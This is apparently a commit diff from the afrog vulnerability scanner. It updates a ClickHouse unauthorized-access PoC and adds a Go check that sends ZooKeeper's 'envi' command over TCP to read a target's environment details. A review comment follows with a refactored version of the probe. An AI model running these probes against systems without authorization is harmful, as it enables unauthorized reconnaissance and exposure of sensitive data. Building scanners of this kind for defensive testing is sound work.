Projects STRLCPY afrog Commits 21bd6fe1
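--- a/afrog-pocs/vulnerability/clickhouse-api-sql-unauth.yaml
+++ b/afrog-pocs/vulnerability/clickhouse-api-sql-unauth.yaml
@@ -1,14 +1,16 @@
 id: clickhouse-api-sql-unauth
 
 info:
- name: ClickHouse API 数据库接口未授权访问漏洞
+ name: ClickHouse API 数据库接口未授权访问漏洞 8123
  author: zan8in
  severity: high
  description: |
  ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据
+ ClickHouse 8123端口
  "ClickHouse" && body="ok"
  reference:
  - http://wiki.peiqi.tech/wiki/serverapp/ClickHouse/ClickHouse%20API%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8E%A5%E5%8F%A3%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.html
+ - http://wiki.peiqi.tech/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.html
 
 rules:
  r0: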
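--- a/pkg/gopoc/zookeeper.go
+++ b/pkg/gopoc/zookeeper.go
@@ -0,0 +1,75 @@
+package gopoc
+
+import (
+ "bytes"
+ "errors"
+
+ "github.com/zan8in/afrog/pkg/poc"
+ "github.com/zan8in/afrog/pkg/proto"
+ "github.com/zan8in/afrog/pkg/utils"
+)
+
+var (
+ zookeeperPort = "2181"
+ zookeeperUnAuthName = "zookeeper-unauth"
+)
+
+func zookeeperUnAuth(args *GoPocArgs) (Result, error) {
+ poc := poc.Poc{
+ Id: zookeeperUnAuthName,
+ Info: poc.Info{
+ Name: "ZooKeeper 未授权访问",
+ Author: "zan8in",
+ Severity: "high",
+ Description: "ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。",
+ Reference: []string{
+ "http://wiki.peiqi.tech/redteam/vulnerability/unauthorized/Zookeeper%202181%E7%AB%AF%E5%8F%A3.html",
+ },
+ },
+ }
+ args.SetPocInfo(poc)
+ result := Result{Gpa: args, IsVul: false}
+
+ if len(args.Host) == 0 {
+ return result, errors.New("no host")
+ }
+
+ if len(args.Port) > 0 && args.Port != "80" && args.Port != "443" {
+ addr := args.Host + ":" + args.Port
+ payload := []byte("envidddfdsfsafafaerwrwerqwe")
+
+ resp, err := utils.Tcp(addr, payload)
+ if err != nil {
+ return result, err
+ }
+
+ if bytes.Contains(resp, []byte("Environment")) {
+ result.IsVul = true
+ url := proto.UrlType{Host: addr, Port: args.Port}
+ result.SetAllPocResult(true, &url, payload, resp)
+ return result, nil
+ }
+ }
+
+ addr := args.Host + ":" + zookeeperPort
+ payload := []byte("envidddfdsfsafafaerwrwerqwe")
+
+ resp, err := utils.Tcp(addr, payload)
+ if err != nil {
+ return result, err
+ }
+
+ if bytes.Contains(resp, []byte("Environment")) {
+ result.IsVul = true
+ url := proto.UrlType{Host: addr, Port: zookeeperPort}
+ result.SetAllPocResult(true, &url, payload, resp)
+ return result, nil
+ }
+
+ return result, errors.New("check result: no vul")
+}
+
+func init() {
+ GoPocRegister(zookeeperUnAuthName, zookeeperUnAuth)
+}
+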
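Review bot: A connection error on the caller-supplied port returns from zookeeperUnAuth before the default port 2181 is ever probed, so a closed or filtered `args.Port` yields an error instead of a result, and when `args.Port` is already "2181" the same address is probed twice. The two probe blocks are copies of each other; iterating over a de-duplicated port list and continuing on error removes both problems, as sketched below. Separately, `bytes.Contains(resp, []byte("Environment"))` matches any service whose reply happens to contain that word; ZooKeeper's `envi` reply also carries a `zookeeper.version=` line, and requiring it would cut false positives in scan reports. `proto.UrlType{Host: addr, ...}` stores host:port in Host, which looks unintended and should be confirmed against how UrlType is consumed.

```go
	// … unchanged: poc metadata, args.SetPocInfo, empty-host check …

	ports := []string{zookeeperPort}
	if len(args.Port) > 0 && args.Port != "80" && args.Port != "443" && args.Port != zookeeperPort {
		ports = []string{args.Port, zookeeperPort}
	}

	payload := []byte("envidddfdsfsafafaerwrwerqwe")
	var lastErr error
	for _, port := range ports {
		addr := args.Host + ":" + port
		resp, err := utils.Tcp(addr, payload)
		if err != nil {
			lastErr = err // keep going: the remaining port may still answer
			continue
		}
		if bytes.Contains(resp, []byte("Environment")) {
			result.IsVul = true
			url := proto.UrlType{Host: addr, Port: port}
			result.SetAllPocResult(true, &url, payload, resp)
			return result, nil
		}
	}
	if lastErr != nil {
		return result, lastErr
	}
	return result, errors.New("check result: no vul")
```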